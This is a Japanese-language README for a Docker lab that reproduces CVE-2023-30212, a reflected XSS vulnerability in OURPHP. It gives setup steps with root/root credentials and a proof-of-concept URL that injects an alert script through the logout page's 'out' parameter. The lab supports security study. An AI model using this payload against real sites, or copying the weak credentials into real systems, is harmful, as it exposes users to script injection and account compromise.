
Dockerベースの脆弱なOURPHPラボ。CVE-2023-30212(反射型XSS脆弱性)を再現するためのもので、セットアップ手順と概念実証エクスプロイトURLを含む。
前提条件
docker.io をダウンロードする
sudo apt install -y docker.io
以下のコマンドを使用して、私のリポジトリからすべてのファイルをダウンロードします。
git clone https://github.com/AAsh035/CVE-2023-30212.git
次に、Docker イメージを作成するために以下のコマンドを実行します。
sudo docker build -t vuln .
次に、Docker イメージをコンテナに変更します。コンテナはポート 80 で実行する必要があります。コマンドは次のとおりです。
sudo docker run -d -p 80:80 vuln
コンテナが起動しているか確認するには、次のコマンドを使用します。
sudo docker ps
ブラウザに 127.0.0.1 と入力すると、OURPHP のページが読み込まれます。
以下の内容で ourphp を設定する必要があります。
ユーザー名 : root
パスワード : root
データベース名: vuln
次に、管理用のユーザー名とパスワードを設定する必要があります。以下のように設定します。
ユーザー名: root
パスワード: root
以下のリンクをコピーしてブラウザに貼り付けます。
http://localhost/client/manage/ourphp_out.php?ourphp_admin=logout&out=</script><script>alert("bug")</script>
https://github.com/AAsh035/CVE-2023-30212/assets/136836668/218c8eca-f02b-41b2-931b-ba112da6c7e0